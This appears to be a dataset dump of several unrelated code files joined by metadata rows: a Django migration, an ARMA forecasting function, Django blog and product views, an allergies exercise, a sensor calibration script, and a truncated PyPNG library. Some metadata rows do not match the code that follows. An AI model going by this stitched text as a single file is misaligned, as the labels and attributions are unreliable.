| StepanPilchyck/FrankieWebPlatform | webshop/views.py | views.py | py | 27,826 | python | en | code | 0 | github-code | 13 |
36078288209 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('commerce', '0007_auto_20151130_1638'),
]
operations = [
migrations.CreateModel(
name='EmployeeSkill',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('expereince', models.IntegerField(default=1)),
('customerOrder', models.ForeignKey(to='commerce.Employee', related_name='employeeSkills')),
],
),
migrations.CreateModel(
name='Skill',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(blank=True, max_length=30)),
],
),
migrations.AddField(
model_name='employeeskill',
name='product',
field=models.ForeignKey(to='commerce.Skill'),
),
]
| oreon/gencomm | commerce/migrations/0008_auto_20151211_1913.py | 0008_auto_20151211_1913.py | py | 1,108 | python | en | code | 1 | github-code | 13 |
1976490981 |
import pandas as pd
import numpy as np
from sklearn.metrics import mean_squared_error
from functions.ols import OLS
def ARMA(df,p,q):
"""
Perform an AutoRegressive Moving Average (ARMA) analysis on a time series DataFrame.
Args:
df (pandas.DataFrame): A DataFrame containing a time series with a column named 'AverageTemperature'.
p (int): The order of the AutoRegressive (AR) model.
q (int): The order of the Moving Average (MA) model.
Returns:
list: A list containing the following items:
1. pandas.DataFrame: A DataFrame with additional columns, including 'Predicted_Values',
representing the ARMA model predictions.
2. float: Mean Squared Error (MSE) of the ARMA model on the testing data.
3. float: Root Mean Squared Error (RMSE) of the ARMA model on the testing data.
This function performs an ARMA analysis on a given time series data, consisting of AR (AutoRegressive) and
MA (Moving Average) modeling. It first extracts the AR component by fitting a linear regression model
to the lagged values of the 'AverageTemperature' series. Then, it calculates the residuals and uses them
for fitting the MA component with another linear regression model. Finally, it combines the AR and MA
components to generate predictions for the entire time series and returns the resulting DataFrame,
along with MSE and RMSE as evaluation metrics.
Note:
- The function assumes that the input DataFrame 'df' contains a column named 'AverageTemperature'.
- The input 'p' and 'q' are positive integers specifying the orders of the AR and MA models, respectively.
- The training-testing split is performed using an 80-20 ratio.
- Linear regression models are used for parameter estimation.
"""
#AR part
# Copy the input DataFrame to avoid modifying the original data
df_temp = df.copy()
# Generate the lagged p terms
for i in range(1, p + 1):
df_temp['Shifted_values_%d' % i] = df_temp['AverageTemperature'].shift(i)
# Determine the size of the training set (80% of the data)
train_size = (int)(0.8 * df_temp.shape[0])
# Split the data into training and testing sets
df_train = pd.DataFrame(df_temp[0:train_size])
df_test = pd.DataFrame(df_temp[train_size:df.shape[0]])
# Remove rows with missing values in the training set
df_train_2 = df_train.dropna()
# Extract lagged features (X) and target variable (y) for training
X_train = df_train_2.iloc[:, 1:].values.reshape(-1, p)
y_train = df_train_2.iloc[:, 0].values.reshape(-1, 1)
# Apply linear regression to estimate AR model coefficients
ols_ar = OLS()
ols_ar.fit(X_train, y_train)
# Generate predictions for the training set
df_train_2 = df_train_2.copy()
df_train_2['Predicted_Values'] = ols_ar.predict(X_train)
# Prepare lagged features for the testing set
X_test = df_test.iloc[:, 1:].values.reshape(-1, p)
# Generate predictions for the testing set
df_test = df_test.copy()
df_test['Predicted_Values'] = ols_ar.predict(X_test)
# Concatenate training and testing data for residuals calculation
df_ar = pd.concat([df_train_2, df_test])
# Calculate residuals
res = pd.DataFrame()
res['Residuals'] = df_ar['AverageTemperature'] - df_ar['Predicted_Values']
# Generate lagged residuals as features
for i in range(1, q + 1):
res['Shifted_values_%d' % i] = res['Residuals'].shift(i)
# Determine the size of the training set (80% of the data)
train_size = (int)(0.8 * res.shape[0])
# Split the data into training and testing sets
res_train = pd.DataFrame(res[0:train_size])
res_test = pd.DataFrame(res[train_size:res.shape[0]])
# Remove rows with missing values in the training set
res_train_2 = res_train.dropna()
# Extract lagged residuals (X) and residuals (y) for training
X_train = res_train_2.iloc[:, 1:].values.reshape(-1, q)
y_train = res_train_2.iloc[:, 0].values.reshape(-1, 1)
# Apply linear regression to estimate MA model coefficients
ols_ma = OLS()
ols_ma.fit(X_train, y_train)
# Generate predictions for the training set
res_train_2 = res_train_2.copy()
res_train_2['Predicted_Values'] = ols_ma.predict(X_train)
# Prepare lagged residuals for the testing set
X_test = res_test.iloc[:, 1:].values.reshape(-1, q)
# Generate predictions for the testing set
res_test = res_test.copy()
res_test['Predicted_Values'] = ols_ma.predict(X_test)
# Calculate RMSE and MSE to evaluate model performance
MSE = mean_squared_error(res_test['Residuals'], res_test['Predicted_Values'])
RMSE = np.sqrt(MSE)
# # Print RMSE and order of the MA model
# print("The MSE is :", MSE,", Value of p : ",p, "Value of q :",q)
# print("The RMSE is :", RMSE,", Value of p : ",p, "Value of q :",q)
# Pediction
res_c = pd.concat([res_train_2,res_test])
# Adding the predicted data from res to the AR part (ARMA)
df_ar.Predicted_Values += res_c.Predicted_Values
return [df_ar,MSE,RMSE] | CyberStefNef/World_Temperature_Analysis | functions/arma.py | arma.py | py | 5,195 | python | en | code | 0 | github-code | 13 |
42545564770 | from django.shortcuts import render, redirect
from django.contrib import messages
from .models import Blog
# Create your views here.
def index(request):
context = {
'bloggers': Blog.objects.all()
}
return render(request, 'index.html', context)
# def update(request, id):
# # pass the post data to the method we wrote and save the response in a variable called errors
# errors = Blog.objects.basic_validator(request.POST)
# # check if the errors dictionary has anything in it
# if len(errors) > 0:
# # if the errors dictionary contains anything, loop through each key-value pair and make a flash message
# for key, value in errors.items():
# messages.error(request, value)
# # redirect the user back to the form to fix the errors
# return redirect('/blog/edit/'+id)
# else:
# # if the errors object is empty, that means there were no errors!
# # retrieve the blog to be updated, make the changes, and save
# blog = Blog.objects.get(id = id)
# blog.name = request.POST['name']
# blog.desc = request.POST['desc']
# blog.save()
# messages.success(request, "Blog successfully updated")
# # redirect to a success route
# return redirect('/blogs')
def new_blogger(request):
new_blogger = Blog.objects.create(
name = request.POST['name'],
desc = request.POST['desc']
)
return redirect('/') | KeithBrantley/Coding_Dojo | python_stack/django/django_full_stack/blog/main/views.py | views.py | py | 1,474 | python | en | code | 1 | github-code | 13 |
11569671201 | class Allergies:
def __init__(self, score):
self._items = {
1: 'eggs',
2: 'peanuts',
4: 'shellfish',
8: 'strawberries',
16: 'tomatoes',
32: 'chocolate',
64: 'pollen',
128: 'cats',
}
self._score = score % 256
def allergic_to(self, item):
return item in self.lst
@property
def lst(self):
allergies = list()
score = self._score
for key in sorted(self._items.keys(), reverse=True):
if score >= key:
score -= key
allergies.append(self._items[key])
if score == 0:
break
return allergies
| ikostan/Exercism_Python_Track | allergies/allergies.py | allergies.py | py | 742 | python | en | code | 0 | github-code | 13 |
26864521725 | import os
import sys
file_dir_path = os.path.dirname(os.path.realpath(__file__))
# add code directory to path
sys.path.append(file_dir_path + '/../../')
from sensor.optimization_angles_general import brute_optimize, plot_print_length, save_distances, \
save_3d_distances
description = "270_blk_dot_mid_floor"
path_img_conf = file_dir_path + "/../../experiments/270deg_partial"
# Brute force optimize -------------------------------------------------------------------------------------------------
images_brute_optimize = [6, 13]
flip_xy_on_ols = True
use_erosion_and_dilation = True
threshold = 50
ranges_cam_laser_FOV = rclf = ((-20, 20), (-20, 20), (43, 55))
file_name_optimize = f'image_{images_brute_optimize}_' \
f'cam_{rclf[0][0]}_{rclf[0][1]}_' \
f'laser_{rclf[1][0]}_{rclf[1][1]}_' \
f'FOV_{rclf[2][0]}_{rclf[2][1]}_' \
f'flip_xy_on_ols_{flip_xy_on_ols}_' \
f'use_erosion_and_dilation_{use_erosion_and_dilation}'
file_name_optimize = file_dir_path + \
'/results/' + \
file_name_optimize \
.replace('[', '_') \
.replace(']', '_') \
.replace(',', '_') \
.replace(' ', '_')
# show_images(path_img_conf, images_brute_optimize, threshold)
if not os.path.exists(file_name_optimize + '.npy'):
print('Starting optimization')
brute_optimize(path_img_conf,
images_brute_optimize,
flip_xy_on_ols=True,
use_erosion_and_dilation=use_erosion_and_dilation,
threshold=threshold,
output_file_name=file_name_optimize,
ranges_cam_laser_FOV=ranges_cam_laser_FOV)
# Eo brute force optimize
# Find best initial parameters -----------------------------------------------------------------------------------------
fov, cam_angle_offset, laser_angle_offset = plot_print_length(file_name_optimize + '.npy',
path_img_conf, length_to_vertical_wall=2380,
do_plot=False)
# EO find best initial parameters
# Calculate and save distances -----------------------------------------------------------------------------------------
filename_2d_ang = 'results/' + \
f'dist_2d_single_path_threshold_{threshold}' \
f'_erosion_dilution_{use_erosion_and_dilation}' \
f'_{description}.npy'
filename_3d_ang = 'results/' + \
f'dist_3_single_path_threshold_{threshold}' \
f'_erosion_dilution_{use_erosion_and_dilation}' \
f'_{description}.npy'
# Calculate and save distances, x, z, rot z (2d + z angle)
if not os.path.exists(filename_2d_ang):
save_distances(path_img_conf, filename_2d_ang, fov=fov, cam_angle_offset=cam_angle_offset,
laser_angle_offset=laser_angle_offset,
threshold=threshold, use_erosion_and_dilation=use_erosion_and_dilation,
limit_estimated_angle_to_field_of_view=37)
# Calculate and save distances, x, y, z
if not os.path.exists(filename_3d_ang):
# Only distances in the range of the filter will be included in the point cloud
xyz_filter = [[-10000, 3000], [-3500, 3500], [-1000, 3500]]
save_3d_distances(filename_2d_ang, filename_3d_ang, xyz_filter)
# EO calculate and save distances
# # View point cloud -----------------------------------------------------------------------------------------------------
# val = np.load(filename_3d_ang)
# v = pptk.viewer(val, val[:, 2])
# v.set(point_size=2)
# v.wait()
# # EO view point cloud
| sensorPointCloud/pointCloudFromImage | results/fine_step_z_270_deg_partial/generate_point_cloud.py | generate_point_cloud.py | py | 3,820 | python | en | code | 1 | github-code | 13 |
28880491199 | from django.http import JsonResponse
from django.shortcuts import render, redirect, get_object_or_404
from django.urls import reverse
from django.views.decorators.http import require_POST
from .models import Product
from accounts.models import Account
def products_list(request):
queryset = Product.objects.all()
context = {
"products": queryset,
}
return render(request, "products/home.html", context=context)
@require_POST
def amount_ajax(request):
pk = request.POST.get("pk")
status = request.POST.get("status")
product = get_object_or_404(Product, pk=pk)
if status == "plus":
product.amount += 1
else:
if product.amount > 0:
product.amount -= 1
else:
redirect("products_list")
product.save()
ctx = {
"amount": product.amount,
}
return JsonResponse(ctx)
def product_register(request):
queryset = Account.objects.all()
context = {
"accounts": queryset,
}
# GET
if request.method == "GET":
return render(request, "products/register.html", context=context)
# POST
title = request.POST["title"]
image = request.FILES["image"]
content = request.POST["content"]
price = request.POST["price"]
amount = request.POST["amount"]
account = Account.objects.get(id=request.POST["account"])
product = Product.objects.create(
title=title,
image=image,
content=content,
price=price,
amount=amount,
account=account,
)
print(product.image)
pk = product.id
url = reverse("products:product_details", kwargs={"pk": pk})
return redirect(to=url)
def product_details(request, pk):
product = Product.objects.get(id=pk)
account = Account.objects.get(id=product.account.pk)
context = {
"product": product,
"account": account,
}
return render(request, "products/details.html", context=context)
def product_update(request, pk):
product = Product.objects.get(id=pk)
accounts = Account.objects.all()
# GET
if request.method == "GET":
context = {
"product": product,
"accounts": accounts,
}
return render(request, "products/update.html", context=context)
# POST
title = request.POST["title"]
try:
image = request.FILES["image"]
except:
image = product.image
content = request.POST["content"]
price = request.POST["price"]
amount = request.POST["amount"]
account = Account.objects.get(id=request.POST["account"])
print(account.name)
product.title = title
product.image = image
product.content = content
product.price = price
product.amount = amount
product.account = account
product.save()
url = reverse("products:product_details", kwargs={"pk": pk})
return redirect(to=url)
def product_delete(request, pk):
product = Product.objects.get(id=pk)
product.delete()
url = reverse("products:products_list")
return redirect(to=url)
| w00ing/piro13_inventory_management | inventory_management/products/views.py | views.py | py | 3,077 | python | en | code | 0 | github-code | 13 |
43347738913 | #!/usr/bin/env python
from __future__ import print_function
# png.py - PNG encoder/decoder in pure Python
#
# Copyright (C) 2006 Johann C. Rocholl <johann@browsershots.org>
# Portions Copyright (C) 2009 David Jones <drj@pobox.com>
# And probably portions Copyright (C) 2006 Nicko van Someren <nicko@nicko.org>
#
# Original concept by Johann C. Rocholl.
#
# LICENCE (MIT)
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
Pure Python PNG Reader/Writer
This Python module implements support for PNG images (see PNG
specification at http://www.w3.org/TR/2003/REC-PNG-20031110/ ). It reads
and writes PNG files with all allowable bit depths
(1/2/4/8/16/24/32/48/64 bits per pixel) and colour combinations:
greyscale (1/2/4/8/16 bit); RGB, RGBA, LA (greyscale with alpha) with
8/16 bits per channel; colour mapped images (1/2/4/8 bit).
Adam7 interlacing is supported for reading and
writing. A number of optional chunks can be specified (when writing)
and understood (when reading): ``tRNS``, ``bKGD``, ``gAMA``.
For help, type ``import png; help(png)`` in your python interpreter.
A good place to start is the :class:`Reader` and :class:`Writer`
classes.
Requires Python 2.3. Limited support is available for Python 2.2, but
not everything works. Best with Python 2.4 and higher. Installation is
trivial, but see the ``README.txt`` file (with the source distribution)
for details.
This file can also be used as a command-line utility to convert
`Netpbm <http://netpbm.sourceforge.net/>`_ PNM files to PNG, and the
reverse conversion from PNG to PNM. The interface is similar to that
of the ``pnmtopng`` program from Netpbm. Type ``python png.py --help``
at the shell prompt for usage and a list of options.
A note on spelling and terminology
----------------------------------
Generally British English spelling is used in the documentation. So
that's "greyscale" and "colour". This not only matches the author's
native language, it's also used by the PNG specification.
The major colour models supported by PNG (and hence by PyPNG) are:
greyscale, RGB, greyscale--alpha, RGB--alpha. These are sometimes
referred to using the abbreviations: L, RGB, LA, RGBA. In this case
each letter abbreviates a single channel: *L* is for Luminance or Luma
or Lightness which is the channel used in greyscale images; *R*, *G*,
*B* stand for Red, Green, Blue, the components of a colour image; *A*
stands for Alpha, the opacity channel (used for transparency effects,
but higher values are more opaque, so it makes sense to call it
opacity).
A note on formats
-----------------
When getting pixel data out of this module (reading) and presenting
data to this module (writing) there are a number of ways the data could
be represented as a Python value. Generally this module uses one of
three formats called "flat row flat pixel", "boxed row flat pixel", and
"boxed row boxed pixel". Basically the concern is whether each pixel
and each row comes in its own little tuple (box), or not.
Consider an image that is 3 pixels wide by 2 pixels high, and each pixel
has RGB components:
Boxed row flat pixel::
list([R,G,B, R,G,B, R,G,B],
[R,G,B, R,G,B, R,G,B])
Each row appears as its own list, but the pixels are flattened so
that three values for one pixel simply follow the three values for
the previous pixel. This is the most common format used, because it
provides a good compromise between space and convenience. PyPNG regards
itself as at liberty to replace any sequence type with any sufficiently
compatible other sequence type; in practice each row is an array (from
the array module), and the outer list is sometimes an iterator rather
than an explicit list (so that streaming is possible).
Flat row flat pixel::
[R,G,B, R,G,B, R,G,B,
R,G,B, R,G,B, R,G,B]
The entire image is one single giant sequence of colour values.
Generally an array will be used (to save space), not a list.
Boxed row boxed pixel::
list([ (R,G,B), (R,G,B), (R,G,B) ],
[ (R,G,B), (R,G,B), (R,G,B) ])
Each row appears in its own list, but each pixel also appears in its own
tuple. A serious memory burn in Python.
In all cases the top row comes first, and for each row the pixels are
ordered from left-to-right. Within a pixel the values appear in the
order, R-G-B-A (or L-A for greyscale--alpha).
There is a fourth format, mentioned because it is used internally,
is close to what lies inside a PNG file itself, and has some support
from the public API. This format is called packed. When packed,
each row is a sequence of bytes (integers from 0 to 255), just as
it is before PNG scanline filtering is applied. When the bit depth
is 8 this is essentially the same as boxed row flat pixel; when the
bit depth is less than 8, several pixels are packed into each byte;
when the bit depth is 16 (the only value more than 8 that is supported
by the PNG image format) each pixel value is decomposed into 2 bytes
(and `packed` is a misnomer). This format is used by the
:meth:`Writer.write_packed` method. It isn't usually a convenient
format, but may be just right if the source data for the PNG image
comes from something that uses a similar format (for example, 1-bit
BMPs, or another PNG file).
And now, my famous members
--------------------------
"""
__version__ = "0.0.18"
import itertools
import math
# http://www.python.org/doc/2.4.4/lib/module-operator.html
import operator
import struct
import sys
# http://www.python.org/doc/2.4.4/lib/module-warnings.html
import warnings
import zlib
from array import array
from functools import reduce
try:
# `cpngfilters` is a Cython module: it must be compiled by
# Cython for this import to work.
# If this import does work, then it overrides pure-python
# filtering functions defined later in this file (see `class
# pngfilters`).
import cpngfilters as pngfilters
except ImportError:
pass
__all__ = ['Image', 'Reader', 'Writer', 'write_chunks', 'from_array']
# The PNG signature.
# http://www.w3.org/TR/PNG/#5PNG-file-signature
_signature = struct.pack('8B', 137, 80, 78, 71, 13, 10, 26, 10)
_adam7 = ((0, 0, 8, 8),
(4, 0, 8, 8),
(0, 4, 4, 8),
(2, 0, 4, 4),
(0, 2, 2, 4),
(1, 0, 2, 2),
(0, 1, 1, 2))
def group(s, n):
# See http://www.python.org/doc/2.6/library/functions.html#zip
return list(zip(*[iter(s)]*n))
def isarray(x):
return isinstance(x, array)
def tostring(row):
return row.tostring()
def interleave_planes(ipixels, apixels, ipsize, apsize):
"""
Interleave (colour) planes, e.g. RGB + A = RGBA.
Return an array of pixels consisting of the `ipsize` elements of
data from each pixel in `ipixels` followed by the `apsize` elements
of data from each pixel in `apixels`. Conventionally `ipixels`
and `apixels` are byte arrays so the sizes are bytes, but it
actually works with any arrays of the same type. The returned
array is the same type as the input arrays which should be the
same type as each other.
"""
itotal = len(ipixels)
atotal = len(apixels)
newtotal = itotal + atotal
newpsize = ipsize + apsize
# Set up the output buffer
# See http://www.python.org/doc/2.4.4/lib/module-array.html#l2h-1356
out = array(ipixels.typecode)
# It's annoying that there is no cheap way to set the array size :-(
out.extend(ipixels)
out.extend(apixels)
# Interleave in the pixel data
for i in range(ipsize):
out[i:newtotal:newpsize] = ipixels[i:itotal:ipsize]
for i in range(apsize):
out[i+ipsize:newtotal:newpsize] = apixels[i:atotal:apsize]
return out
def check_palette(palette):
"""Check a palette argument (to the :class:`Writer` class)
for validity. Returns the palette as a list if okay; raises an
exception otherwise.
"""
# None is the default and is allowed.
if palette is None:
return None
p = list(palette)
if not (0 < len(p) <= 256):
raise ValueError("a palette must have between 1 and 256 entries")
seen_triple = False
for i,t in enumerate(p):
if len(t) not in (3,4):
raise ValueError(
"palette entry %d: entries must be 3- or 4-tuples." % i)
if len(t) == 3:
seen_triple = True
if seen_triple and len(t) == 4:
raise ValueError(
"palette entry %d: all 4-tuples must precede all 3-tuples" % i)
for x in t:
if int(x) != x or not(0 <= x <= 255):
raise ValueError(
"palette entry %d: values must be integer: 0 <= x <= 255" % i)
return p
def check_sizes(size, width, height):
"""Check that these arguments, in supplied, are consistent.
Return a (width, height) pair.
"""
if not size:
return width, height
if len(size) != 2:
raise ValueError(
"size argument should be a pair (width, height)")
if width is not None and width != size[0]:
raise ValueError(
"size[0] (%r) and width (%r) should match when both are used."
% (size[0], width))
if height is not None and height != size[1]:
raise ValueError(
"size[1] (%r) and height (%r) should match when both are used."
% (size[1], height))
return size
def check_color(c, greyscale, which):
"""Checks that a colour argument for transparent or
background options is the right form. Returns the colour
(which, if it's a bar integer, is "corrected" to a 1-tuple).
"""
if c is None:
return c
if greyscale:
try:
len(c)
except TypeError:
c = (c,)
if len(c) != 1:
raise ValueError("%s for greyscale must be 1-tuple" %
which)
if not isinteger(c[0]):
raise ValueError(
"%s colour for greyscale must be integer" % which)
else:
if not (len(c) == 3 and
isinteger(c[0]) and
isinteger(c[1]) and
isinteger(c[2])):
raise ValueError(
"%s colour must be a triple of integers" % which)
return c
class Error(Exception):
def __str__(self):
return self.__class__.__name__ + ': ' + ' '.join(self.args)
class FormatError(Error):
"""Problem with input file format. In other words, PNG file does
not conform to the specification in some way and is invalid.
"""
class ChunkError(FormatError):
pass
class Writer:
"""
PNG encoder in pure Python.
"""
def __init__(self, width=None, height=None,
size=None,
greyscale=False,
alpha=False,
bitdepth=8,
palette=None,
transparent=None,
background=None,
gamma=None,
compression=None,
interlace=False,
bytes_per_sample=None, # deprecated
planes=None,
colormap=None,
maxval=None,
chunk_limit=2**20,
x_pixels_per_unit = None,
y_pixels_per_unit = None,
unit_is_meter = False):
"""
Create a PNG encoder object.
Arguments:
width, height
Image size in pixels, as two separate arguments.
size
Image size (w,h) in pixels, as single argument.
greyscale
Input data is greyscale, not RGB.
alpha
Input data has alpha channel (RGBA or LA).
bitdepth
Bit depth: from 1 to 16.
palette
Create a palette for a colour mapped image (colour type 3).
transparent
Specify a transparent colour (create a ``tRNS`` chunk).
background
Specify a default background colour (create a ``bKGD`` chunk).
gamma
Specify a gamma value (create a ``gAMA`` chunk).
compression
zlib compression level: 0 (none) to 9 (more compressed);
default: -1 or None.
interlace
Create an interlaced image.
chunk_limit
Write multiple ``IDAT`` chunks to save memory.
x_pixels_per_unit
Number of pixels a unit along the x axis (write a
`pHYs` chunk).
y_pixels_per_unit
Number of pixels a unit along the y axis (write a
`pHYs` chunk). Along with `x_pixel_unit`, this gives
the pixel size ratio.
unit_is_meter
`True` to indicate that the unit (for the `pHYs`
chunk) is metre.
The image size (in pixels) can be specified either by using the
`width` and `height` arguments, or with the single `size`
argument. If `size` is used it should be a pair (*width*,
*height*).
`greyscale` and `alpha` are booleans that specify whether
an image is greyscale (or colour), and whether it has an
alpha channel (or not).
`bitdepth` specifies the bit depth of the source pixel values.
Each source pixel value must be an integer between 0 and
``2**bitdepth-1``. For example, 8-bit images have values
between 0 and 255. PNG only stores images with bit depths of
1,2,4,8, or 16. When `bitdepth` is not one of these values,
the next highest valid bit depth is selected, and an ``sBIT``
(significant bits) chunk is generated that specifies the
original precision of the source image. In this case the
supplied pixel values will be rescaled to fit the range of
the selected bit depth.
The details of which bit depth / colour model combinations the
PNG file format supports directly, are somewhat arcane
(refer to the PNG specification for full details). Briefly:
"small" bit depths (1,2,4) are only allowed with greyscale and
colour mapped images; colour mapped images cannot have bit depth
16.
For colour mapped images (in other words, when the `palette`
argument is specified) the `bitdepth` argument must match one of
the valid PNG bit depths: 1, 2, 4, or 8. (It is valid to have a
PNG image with a palette and an ``sBIT`` chunk, but the meaning
is slightly different; it would be awkward to press the
`bitdepth` argument into service for this.)
The `palette` option, when specified, causes a colour
mapped image to be created: the PNG colour type is set to 3;
`greyscale` must not be set; `alpha` must not be set;
`transparent` must not be set; the bit depth must be 1,2,4,
or 8. When a colour mapped image is created, the pixel values
are palette indexes and the `bitdepth` argument specifies the
size of these indexes (not the size of the colour values in
the palette).
The palette argument value should be a sequence of 3- or
4-tuples. 3-tuples specify RGB palette entries; 4-tuples
specify RGBA palette entries. If both 4-tuples and 3-tuples
appear in the sequence then all the 4-tuples must come
before all the 3-tuples. A ``PLTE`` chunk is created; if there
are 4-tuples then a ``tRNS`` chunk is created as well. The
``PLTE`` chunk will contain all the RGB triples in the same
sequence; the ``tRNS`` chunk will contain the alpha channel for
all the 4-tuples, in the same sequence. Palette entries
are always 8-bit.
If specified, the `transparent` and `background` parameters must
be a tuple with three integer values for red, green, blue, or
a simple integer (or singleton tuple) for a greyscale image.
If specified, the `gamma` parameter must be a positive number
(generally, a `float`). A ``gAMA`` chunk will be created.
Note that this will not change the values of the pixels as
they appear in the PNG file, they are assumed to have already
been converted appropriately for the gamma specified.
The `compression` argument specifies the compression level to
be used by the ``zlib`` module. Values from 1 to 9 specify
compression, with 9 being "more compressed" (usually smaller
and slower, but it doesn't always work out that way). 0 means
no compression. -1 and ``None`` both mean that the default
level of compession will be picked by the ``zlib`` module
(which is generally acceptable).
If `interlace` is true then an interlaced image is created
(using PNG's so far only interace method, *Adam7*). This does
not affect how the pixels should be presented to the encoder,
rather it changes how they are arranged into the PNG file.
On slow connexions interlaced images can be partially decoded
by the browser to give a rough view of the image that is
successively refined as more image data appears.
.. note ::
Enabling the `interlace` option requires the entire image
to be processed in working memory.
`chunk_limit` is used to limit the amount of memory used whilst
compressing the image. In order to avoid using large amounts of
memory, multiple ``IDAT`` chunks may be created.
"""
# At the moment the `planes` argument is ignored;
# its purpose is to act as a dummy so that
# ``Writer(x, y, **info)`` works, where `info` is a dictionary
# returned by Reader.read and friends.
# Ditto for `colormap`.
width, height = check_sizes(size, width, height)
del size
if width <= 0 or height <= 0:
raise ValueError("width and height must be greater than zero")
if not isinteger(width) or not isinteger(height):
raise ValueError("width and height must be integers")
# http://www.w3.org/TR/PNG/#7Integers-and-byte-order
if width > 2**32-1 or height > 2**32-1:
raise ValueError("width and height cannot exceed 2**32-1")
if alpha and transparent is not None:
raise ValueError(
"transparent colour not allowed with alpha channel")
if bytes_per_sample is not None:
warnings.warn('please use bitdepth instead of bytes_per_sample',
DeprecationWarning)
if bytes_per_sample not in (0.125, 0.25, 0.5, 1, 2):
raise ValueError(
"bytes per sample must be .125, .25, .5, 1, or 2")
bitdepth = int(8*bytes_per_sample)
del bytes_per_sample
if not isinteger(bitdepth) or bitdepth < 1 or 16 < bitdepth:
raise ValueError("bitdepth (%r) must be a positive integer <= 16" %
bitdepth)
self.rescale = None
palette = check_palette(palette)
if palette:
if bitdepth not in (1,2,4,8):
raise ValueError("with palette, bitdepth must be 1, 2, 4, or 8")
if transparent is not None:
raise ValueError("transparent and palette not compatible")
if alpha:
raise ValueError("alpha and palette not compatible")
if greyscale:
raise ValueError("greyscale and palette not compatible")
else:
# No palette, check for sBIT chunk generation.
if alpha or not greyscale:
if bitdepth not in (8,16):
targetbitdepth = (8,16)[bitdepth > 8]
self.rescale = (bitdepth, targetbitdepth)
bitdepth = targetbitdepth
del targetbitdepth
else:
assert greyscale
assert not alpha
if bitdepth not in (1,2,4,8,16):
if bitdepth > 8:
targetbitdepth = 16
elif bitdepth == 3:
targetbitdepth = 4
else:
assert bitdepth in (5,6,7)
targetbitdepth = 8
self.rescale = (bitdepth, targetbitdepth)
bitdepth = targetbitdepth
del targetbitdepth
if bitdepth < 8 and (alpha or not greyscale and not palette):
raise ValueError(
"bitdepth < 8 only permitted with greyscale or palette")
if bitdepth > 8 and palette:
raise ValueError(
"bit depth must be 8 or less for images with palette")
transparent = check_color(transparent, greyscale, 'transparent')
background = check_color(background, greyscale, 'background')
# It's important that the true boolean values (greyscale, alpha,
# colormap, interlace) are converted to bool because Iverson's
# convention is relied upon later on.
self.width = width
self.height = height
self.transparent = transparent
self.background = background
self.gamma = gamma
self.greyscale = bool(greyscale)
self.alpha = bool(alpha)
self.colormap = bool(palette)
self.bitdepth = int(bitdepth)
self.compression = compression
self.chunk_limit = chunk_limit
self.interlace = bool(interlace)
self.palette = palette
self.x_pixels_per_unit = x_pixels_per_unit
self.y_pixels_per_unit = y_pixels_per_unit
self.unit_is_meter = bool(unit_is_meter)
self.color_type = 4*self.alpha + 2*(not greyscale) + 1*self.colormap
assert self.color_type in (0,2,3,4,6)
self.color_planes = (3,1)[self.greyscale or self.colormap]
self.planes = self.color_planes + self.alpha
# :todo: fix for bitdepth < 8
self.psize = (self.bitdepth/8) * self.planes
def make_palette(self):
"""Create the byte sequences for a ``PLTE`` and if necessary a
``tRNS`` chunk. Returned as a pair (*p*, *t*). *t* will be
``None`` if no ``tRNS`` chunk is necessary.
"""
p = array('B')
t = array('B')
for x in self.palette:
p.extend(x[0:3])
if len(x) > 3:
t.append(x[3])
p = tostring(p)
t = tostring(t)
if t:
return p,t
return p,None
def write(self, outfile, rows):
"""Write a PNG image to the output file. `rows` should be
an iterable that yields each row in boxed row flat pixel
format. The rows should be the rows of the original image,
so there should be ``self.height`` rows of ``self.width *
self.planes`` values. If `interlace` is specified (when
creating the instance), then an interlaced PNG file will
be written. Supply the rows in the normal image order;
the interlacing is carried out internally.
.. note ::
Interlacing will require the entire image to be in working
memory.
"""
if self.interlace:
fmt = 'BH'[self.bitdepth > 8]
a = array(fmt, itertools.chain(*rows))
return self.write_array(outfile, a)
nrows = self.write_passes(outfile, rows)
if nrows != self.height:
raise ValueError(
"rows supplied (%d) does not match height (%d)" %
(nrows, self.height))
def write_passes(self, outfile, rows, packed=False):
"""
Write a PNG image to the output file.
Most users are expected to find the :meth:`write` or
:meth:`write_array` method more convenient.
The rows should be given to this method in the order that
they appear in the output file. For straightlaced images,
this is the usual top to bottom ordering, but for interlaced
images the rows should have already been interlaced before
passing them to this function.
`rows` should be an iterable that yields each row. When
`packed` is ``False`` the rows should be in boxed row flat pixel
format; when `packed` is ``True`` each row should be a packed
sequence of bytes.
"""
# http://www.w3.org/TR/PNG/#5PNG-file-signature
outfile.write(_signature)
# http://www.w3.org/TR/PNG/#11IHDR
write_chunk(outfile, b'IHDR',
struct.pack("!2I5B", self.width, self.height,
self.bitdepth, self.color_type,
0, 0, self.interlace))
# See :chunk:order
# http://www.w3.org/TR/PNG/#11gAMA
if self.gamma is not None:
write_chunk(outfile, b'gAMA',
struct.pack("!L", int(round(self.gamma*1e5))))
# See :chunk:order
# http://www.w3.org/TR/PNG/#11sBIT
if self.rescale:
write_chunk(outfile, b'sBIT',
struct.pack('%dB' % self.planes,
*[self.rescale[0]]*self.planes))
# :chunk:order: Without a palette (PLTE chunk), ordering is
# relatively relaxed. With one, gAMA chunk must precede PLTE
# chunk which must precede tRNS and bKGD.
# See http://www.w3.org/TR/PNG/#5ChunkOrdering
if self.palette:
